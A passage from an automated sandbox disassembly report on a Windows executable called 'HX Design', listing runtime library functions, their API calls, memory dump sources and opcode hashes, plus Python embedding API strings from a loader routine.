Instruction ID: c79b71c2989ce2cdab7a95e1d82a21e42d15d52374114a479f549902bfd0e9bf
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: A0D09E10B0970A72EF143B745C950799255AF48B01FD41438C86B86393DDACA84DE360

Function 00007FF73207013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070277

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 4e52f43d3751e9ee8d3ead5ea3cc6b378f6371290f23be4914f33c39012a5b2e
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 82511921B0D241A6F764BA2D950077AE292BF84BB4F988734DD7D077D5CEBCE409E620

Function 00007FF73207C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF73207C2CD), ref: 00007FF73207C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF73207C2CD), ref: 00007FF73207C18A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: 0951110e04afcd601b5bcd0ea8e43cb15c2962e5385ccc5e352e290fd50850b2
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 16110421708A8191DA20AB29B854079E361FB52FF0F940331EE7D0B7E8CEBCD018D710

Function 00007FF732075924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF732075957
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF732075839), ref: 00007FF73207596D

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction ID: c266c2288e70c2df7cf00052a8f31d9ea4a8d2f3847caffcfaa776bb6d21a138
Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction Fuzzy Hash: BB11A77160C742D1EB546B58A45107BF760FB84771F900236FAAD819E4EFACD458EB20

Function 00007FF73207A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 529dcf89f30815f5baa4e9da6c9bc666eddc1c690ef2c4977b07a7f388ed66d9
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: EEE08610F1920272FF087BF558451399250AF84700FC40030C81D932A2EDAC685DE730

Function 00007FF73207AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABC6
GetLastError.KERNEL32(?,?,?,00007FF73207A9D5,?,?,00000000,00007FF73207AA8A), ref: 00007FF73207ABD0

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 2efcec7a8f241a409b2e8334b8400b74e6397cc9e3deb9c6ccefcc9e219773cc
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: D721D811F0868261FEA4B759A49437D92929FC47A0F884239DA2E577D3CEEDE44DF320

Function 00007FF73207BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207BED4

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: e2d723c97b07eda993b38d71a23a8e668700ecbb1697e0c5dec6bab3d869dd4b
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 8541C532A1824597EA34BB1DA54027DF7A0EB55B90F900131EB8E437D1CFADE406EB71

Function 00007FF732067F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF73206803A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
Instruction ID: ef733f37ffa014ac3a68f62e522e984fcfe559d21026ab6700ddab528cfe89e2
Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
Instruction Fuzzy Hash: 6821D321B18652A6FE90BA2279443BAE651FF45BC4FC85930EE0C07786CEBDE04DD324

Function 00007FF73207B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207B9C2

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: b2268808dcc6895e0fef63df0caa3147cf879b00530e18e2fb3714a2d01f9d31
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: F531A422A18652A6F751BB5D884137DAAA0AF80BA0FC10135E96D073D2DFFCE449E731

Function 00007FF732079961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF73207998F

Part of subcall function 00007FF732079A88: GetModuleHandleExW.KERNEL32 ref: 00007FF732079AAD
Part of subcall function 00007FF732079A88: GetProcAddress.KERNEL32 ref: 00007FF732079AC3
Part of subcall function 00007FF732079A88: FreeLibrary.KERNEL32 ref: 00007FF732079AEA

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 339ef3e4b319c8126ec87b10ec3bffebb118d60779ba7046f0f0fe3e47245435
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: AC218D72B0574999EB24AF68C4802BC73A0FB44718F840636D7AC06AC5DFB8D548D750

Function 00007FF732075F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075EF9

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 482b3acd5742264b58462f63515813273879aa820c5c5bf9170c4a8ece18edff
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: F511A531A1C64192FA60BF9994002BDEA60FF85B84FC44435EE8C57AD6CFBDD404E720

Function 00007FF732086354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732086377

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 3ad266e4316c9312677d1b971cfd184646fc60c70f333835db715ea51f52a890
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 7F213832A08A4597EB60AF18E08037EB3A0FB84B50F954234E7AD476D9DF7CD408DB10

Function 00007FF7320703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732070410

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b39856e5f9d064bf5c242c4a17b82f2fc38f4900213d07eb6032335b712e4a18
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: F101A561A0874552E904FF5A9A001B9E691FF85FE0F884631DE5C23BD6CEBCD445E310

Function 00007FF732077EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732077F3A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction ID: 9dad20b4ed386c369d777a2caa12f764d1c031a60900902b85ae327d2108ab69
Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction Fuzzy Hash: 6A01B120E1D68360FEA47B29664117AD190BF44BE0FD44635EA1C83AE6DFFCE459E230

Function 00007FF732078238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732078251

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: a7712a12f328a3f97be2da87f6987047da6d42c5c9d2db9d2581cbeec2ed0727
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 85E01260F1C707A7FA553AAC55C217995209FA9341FC04534E9080A2D3EDBC6C5EF631

Function 00007FF73207EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF73207B32A,?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A), ref: 00007FF73207EBED

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 1f96bf4ecae490a7da1f59737f2ddb23586a8f836cee10f8ee85a6a422130b44
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: A6F06D64B0A206A0FE59776D98513B68AE09F88B80FCC5530CD0F863D2ED9CE489E270

Function 00007FF73207D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF732070C90,?,?,?,00007FF7320722FA,?,?,?,?,?,00007FF732073AE9), ref: 00007FF73207D63A

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: e46a7dc5416d65d3a91827f409b30fa18f877e6dfa75c5d0ca93540f6e0bde42
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 6CF0F810B09286A5FE647779584167592909F847A0FC80730DD7E862C2EEACA488E630

Non-executed Functions

Function 00007FF732065830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065840
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065852
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065889
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206589B
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658B4
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658C6
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658DF
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658F1
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206590D
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206591F
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206593B
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206594D
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065969
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206597B
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065997
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659A9
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659C5
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659D7

Strings

PyImport_ExecCodeModule, xrefs: 00007FF732065C11, 00007FF732065C33
PyUnicode_Decode, xrefs: 00007FF732065EF1, 00007FF732065F13
PyUnicode_AsUTF8, xrefs: 00007FF732065EC3, 00007FF732065EE5
PyObject_GetAttrString, xrefs: 00007FF732065D53, 00007FF732065D75
PySys_GetObject, xrefs: 00007FF732065E67, 00007FF732065E89
PySys_SetObject, xrefs: 00007FF732065E95, 00007FF732065EB7
PyUnicode_FromString, xrefs: 00007FF732065F7B, 00007FF732065F9D
Py_ExitStatusException, xrefs: 00007FF7320658AA, 00007FF7320658CC
Py_DecodeLocale, xrefs: 00007FF73206587F, 00007FF7320658A1
PyObject_CallFunction, xrefs: 00007FF732065CF7, 00007FF732065D19
PyImport_ImportModule, xrefs: 00007FF732065C3F, 00007FF732065C61
PyConfig_InitIsolatedConfig, xrefs: 00007FF7320659BB, 00007FF7320659DD
PyObject_Str, xrefs: 00007FF732065DAF, 00007FF732065DD1
PyErr_Occurred, xrefs: 00007FF732065B2B, 00007FF732065B4D
PyConfig_Read, xrefs: 00007FF7320659E9, 00007FF732065A0B
PyMem_RawFree, xrefs: 00007FF732065C9B, 00007FF732065CBD
PyObject_SetAttrString, xrefs: 00007FF732065D81, 00007FF732065DA3
PyStatus_Exception, xrefs: 00007FF732065E39, 00007FF732065E5B
PyErr_Restore, xrefs: 00007FF732065B87, 00007FF732065BA9
PyModule_GetDict, xrefs: 00007FF732065CC9, 00007FF732065CEB
PyUnicode_Replace, xrefs: 00007FF732065FD7, 00007FF732065FF9
PyUnicode_FromFormat, xrefs: 00007FF732065F4D, 00007FF732065F6F
PyErr_Clear, xrefs: 00007FF732065AA1, 00007FF732065AC3
PyErr_Fetch, xrefs: 00007FF732065ACF, 00007FF732065AF1
PyUnicode_Join, xrefs: 00007FF732065FA9, 00007FF732065FCB
GetProcAddress, xrefs: 00007FF732065868
PyUnicode_DecodeFSDefault, xrefs: 00007FF732065F1F, 00007FF732065F41
PyEval_EvalCode, xrefs: 00007FF732065BB5, 00007FF732065BD7
PyConfig_SetString, xrefs: 00007FF732065A45, 00007FF732065A67
PyConfig_SetWideStringList, xrefs: 00007FF732065A73, 00007FF732065A95
PyImport_AddModule, xrefs: 00007FF732065BE3, 00007FF732065C05
PyConfig_SetBytesString, xrefs: 00007FF732065A17, 00007FF732065A39
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF732065DDD, 00007FF732065DFF
PyConfig_Clear, xrefs: 00007FF73206598D, 00007FF7320659AF
PyObject_CallFunctionObjArgs, xrefs: 00007FF732065D25, 00007FF732065D47
